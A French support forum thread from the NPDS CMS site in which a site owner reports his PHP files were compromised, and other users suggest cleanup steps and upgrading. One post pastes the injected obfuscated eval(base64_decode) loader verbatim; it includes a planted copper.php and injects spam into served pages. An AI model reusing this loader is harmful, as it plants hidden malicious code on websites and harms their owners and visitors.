Gestion de Contenu, de Communauté et de groupes de travail collaboratif - Open Source, français, sécurisé, stable et performant

  • MODULES

    Pour étendre les nombreuses fonctionnalités disponibles de base - modules.npds.org est à votre disposition.

    Des modules complémentaires, une communauté de développeurs active, des forums pour vos questions ... NPDS  est aussi une plateforme de développement !
  • STYLES

    Vous cherchez des thèmes graphiques pour votre portail ou votre communauté : styles.npds.org est à votre disposition.

    Des thèmes du plus simple au plus sophistiqué. Des thèmes facilement modifiables et toujours en Open-Source - Laissez simplement parler votre imagination !
  • BIBLES

    La documentation indispensable pour personnaliser et exploiter toute la puissante de NPDS  est à votre disposition sur bible.npds.org.

    Vous pouvez participer à l'effort de documentation - rien de plus simple : contactez un membre de la Team de développement et nous vous ouvrirons un compte sur le Wiki !
Devenir membre    |    Identifiant : Mot de Passe : -
Au delà de la gestion de contenu 'classique', NPDS met en oeuvre un ensemble de fonctions spécifiquement dédiées à la gestion de Communauté et de groupes de travail collaboratif.
Il s'agit d'un Content & Community Management System (CCMS) robuste, sécurisé, complet, performant et parlant vraiment français.

Gérez votre Communauté d'utilisateurs, vos groupes de travail collaboratif, publiez, gérez et organisez votre contenu grâce aux puissants outils disponibles de base.
  • Multi langues (Français, Anglais, Allemand, Espagnol, Chinois)
  • Respect des standards : UTF8, XHTML, CSS, ...
  • Système de blocs avancés
  • Installation et administration complète et centralisée
  • Editeur HTML intégré
  • Gestionnaire de fichier en ligne
  • Gestion des groupes de membres
  • Ecriture collaborative de documents (PAD)
  • Forums évolués
  • Mini-sites (pour les membres et les groupes de travail)
  • Chat temp réel
  • Système de News et de rubriques complet (édition, révision, publication)
  • ...
Gratuit et libre (Open-Source), développé en PHP, NPDS est personnalisable grâce à de nombreux thèmes et modules et ne requiert que quelques compétences de base.
NPDS Workplace - groupe de travail collaboratif
 NPDS WorkSpace - tous l'univers du travail collaboratif.
Modéré par : developpeur jpb Jireck 
Index du Forum » » Sécurité » » Forum.php piraté !  
2 pages [ 1 | 2 ]
AuteurForum.php piraté !
cto
576      

cto
  Posté : 28-02-2009 12:15

Bonjour,

Depuis peu, mon site NPDS en version Sable 5.10 est victime de piratage...
Exemple : http://cto.free.fr/forum.php

Vous y constaterez, que l'entête du fichier FORUM.PHP montre des lignes bizarres :

I DON T WANNA i don t wanna
LA QUINTA HOTEL IRVINE
la quinta hotel irvine
NEW JERSEY BRIDAL SHOWS
new jersey bridal shows



Comment éviter cela et les effacer ?
Je sais que vous allez me dire de passer à la dernière version mais j'ai beaucoup travaillé sur cette version et j'aimerais la conserver...
N'est-elle pas assez sécurisée ?

Merci d'avance...
Cyril.

  Profil  www  Citation   
cto
576      

cto
  Posté : 28-02-2009 12:26

Précision : j'ai constaté que cela ne s'arrête pas à FORUM.PHP mais à l'ensemble du site
Cela devient urgent...
Que puis-je faire ?

Merci.

  Profil  www  Citation   
oim
1453       
 

oim
  Posté : 28-02-2009 12:29

Essaye de regarde tes logs, puis enleve tous les liens ajoutés et change tous tes MDP admin (pour être sur qu'il ne passe pas par un compte admin).
Et as-tu mis des modules non validés, ou des scripts "fait maison" ?

  Profil  www  Citation   
cto
576      

cto
  Posté : 28-02-2009 12:30

Encore une précision :

<?php /**/eval(base_64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFN bJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvbW50LzE1Mi9zZG EvMi8zL2N0by9lZGl0ZXVyL3RpbnlfbWNlL3RoZW1lcy9ucGRzL2RvY3MvZW5nbGlzaC9pbWFnZXMvY 29wcGVyLnBocCcpKXtpbmNsdWRlX29uY2UoJy9tbnQvMTUyL3NkYS8yLzMvY3RvL2VkaXRldXIvdGlu eV9tY2UvdGhlbWVzL25wZHMvZG9jcy9lbmdsaXNoL2ltYWdlcy9jb3BwZXIucGhwJyk7aWYoZnVuY3R pb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2 V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsM ywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9 JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE 2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKH N1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ 29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lm KHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHl bXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YX J0KCdkZ29iaCcpO319fQ==')); ?>


Voici la ligne de code qui apparait dans tous mes fichiers PHP...
D'après l'archive originale cela version Sable, il semble que cela n'y soit pas.

Comment cela est-ce possible ?
++


  Profil  www  Citation   
cto
576      

cto
  Posté : 28-02-2009 12:33

Citation : oim 
Essaye de regarde tes logs, puis enleve tous les liens ajoutés et change tous tes MDP admin (pour être sur qu'il ne passe pas par un compte admin).
Et as-tu mis des modules non validés, ou des scripts "fait maison" ? 

Mot de passe Admin changé, Root effacé, Logs vides , aucun script maison...
je ne vois pas comment cela est possible...
++

  Profil  www  Citation   
Jireck
7975       

Jireck
  Posté : 28-02-2009 12:44

deja passer ta version vers evol....


  Profil  www  Citation   
mimit54
55    

mimit54
  Posté : 28-02-2009 12:46

Bonjour,
J'ai eu la même attaque le 06/02 aves NPDS Evolution.
J'ai trouvé la solution, voir ce post
http://www.npds.org/viewtopic.php?topic=24181&forum=12
Par contre, je ne sais toujours pas, par où cela a pu arriver.

Message édité par : mimit54 / 28-02-2009 13:32


  Profil  Citation   
Anonyme
19753  

Anonyme
  Posté : 28-02-2009 14:04

Merci après avoir lu ton post, j'ai voulu accéder aux "Préférences" de mon site pour désactiver le "Gestionnaire de Fichiers" mais j'obtiens ce message d'erreur :

Warning: main(admin/settings.php) [function.main]: failed to open stream: No such file or directory in /mnt/152/sda/2/3/cto/admin.php on line 1228

Warning: main() [function.!include!]: Failed opening 'admin/settings.php' for inclusion (!include!_path='/mnt/152/sda/2/3/cto/!include!:.:/usr/php4/lib/php') in /mnt/152/sda/2/3/cto/admin.php on line 1228



De mieux en mieux...

  Citation   
cto
576      

cto
  Posté : 28-02-2009 14:05

Anonyme it's me
D'ailleurs, je n'accède à aucun menu Administrateur !!!


Message édité par : cto / 28-02-2009 14:06


  Profil  www  Citation   
cto
576      

cto
  Posté : 28-02-2009 14:57

Je ne sais pas comment effacer tout ce code dans tous mes fichiers PHP, j'aimerais savoir faire cela : si ligne
<?php /**/eval(base_64_decode('aWYoZnVuY3Rpb25..........O319fQ==')); ?>

est présent dans les fichiers du type PHP alors supprimer cette ligne où alors effacer de
<?php /**/eval(base_64_decode

à
O319fQ==')); ?>

...

Qq. pourrait-il m'aider ?
A cause de cela, mon site NPDS est complément pourri

++

Message édité par : cto / 28-02-2009 14:58


  Profil  www  Citation   
cto
576      

cto
  Posté : 28-02-2009 16:25

Citation : cto
Anonyme it's me
D'ailleurs, je n'accède à aucun menu Administrateur !!!

Message édité par : cto / 28-02-2009 14:06



J'ai trouvé pour cela : le dossier "admin" à la racine avait disparu...
++

Message édité par : cto / 28-02-2009 16:26


  Profil  www  Citation   
cto
576      

cto
  Posté : 28-02-2009 18:22

Je suis passé à Sable Evolution 08.06 et cela semble avoir réglé le pb.
J'essuie encore qq. bugs mais j'y travaille (recherches sur le forum)...
++

  Profil  www  Citation   
mimit54
55    

mimit54
  Posté : 28-02-2009 18:26

J'avais les mêmes lignes de texte avant le bandeau, mais uniquement pour la publication d'un article, l'apparition d'un formulaire demandant login et password si je voulais changer de thème et je ne sais plus trop où, et bien sûr comme toi cette ligne de code dans tous les fichiers PHP. Par contre pas de Pb admin .
Pour corriger:
Retrait du copper.php, et plus aucun souci, par précaution j'ai rechargé tous les fichiers PHP.

As tu localisé copper.php ?

  Profil  Citation   
cto
576      

cto
  Posté : 28-02-2009 18:32

Je n'ai pas ce fichier...
Apparemment le bug était similaire au tien malgré cela je n'avais pas ce type de formulaire.
++

  Profil  www  Citation   
developpeur
24559       
 

developpeur
  Posté : 04-03-2009 12:32

vous êtes héberger chez qui ?

  Profil  E-mail  www  Citation   
Aller à la page : [ 1 | 2 ]
  
Sauter à :

Temps : 0.0153 seconde(s)